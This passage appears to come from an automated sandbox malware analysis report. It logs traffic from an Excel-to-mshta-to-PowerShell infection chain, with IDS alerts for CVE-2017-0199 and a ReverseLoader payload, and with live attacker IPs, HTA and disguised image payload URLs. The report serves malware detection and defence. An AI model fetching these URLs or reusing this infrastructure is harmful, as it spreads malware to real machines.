        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49166
        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 23.95.235.29:80
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49164
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.193.137:443 -> 192.168.2.22:49174
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 23.95.235.29 23.95.235.29
        Source: Joe Sandbox ViewIP Address: 23.95.235.29 23.95.235.29
        Source: Joe Sandbox ViewIP Address: 151.101.193.137 151.101.193.137
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 23.95.235.29:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 23.95.235.29:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49173 -> 23.95.235.29:80
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-AliveCookie: sess=123
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 23.95.235.29If-Range: "23f26-6291fccf92813"
        Source: global trafficHTTP traffic detected: GET /118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 13 Dec 2024 05:06:59 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "23f26-6291fccf92813"
        Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899C7018 URLDownloadToFileW,8_2_000007FE899C7018
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2D0F17D.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-AliveCookie: sess=123
        Source: global trafficHTTP traffic detected: GET /VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&veranda HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: curt.wiz.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 23.95.235.29If-Range: "23f26-6291fccf92813"
        Source: global trafficHTTP traffic detected: GET /118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 13 Dec 2024 05:06:59 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "23f26-6291fccf92813"
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: mshta.exe, 00000004.00000002.458394277.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457247139.000000000369D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/
        Source: powershell.exe, 00000008.00000002.478285781.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesize
        Source: powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF
        Source: powershell.exe, 00000008.00000002.485183469.000000001C262000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.524693092.000000001AE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFC:
        Source: powershell.exe, 00000008.00000002.478285781.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFp
        Source: mshta.exe, 00000010.00000002.512248812.0000000000340000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.0000000002811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
        Source: mshta.exe, 00000004.00000003.457688239.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.506693238.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.506713612.00000000029BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta%64%6f%63%
        Source: mshta.exe, 00000004.00000002.457860931.00000000002B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457492496.00000000002B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta...
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.0000000002811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaC:
        Source: mshta.exe, 00000004.00000003.457688239.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511256178.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.506656785.00000000029B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htahttp://23.
        Source: mshta.exe, 00000004.00000002.457860931.000000000024E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512248812.00000000002DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htalife=fluff
        Source: mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/PROC
        Source: mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/ic
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C230000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.0000000002811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.484839464.000000001A890000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
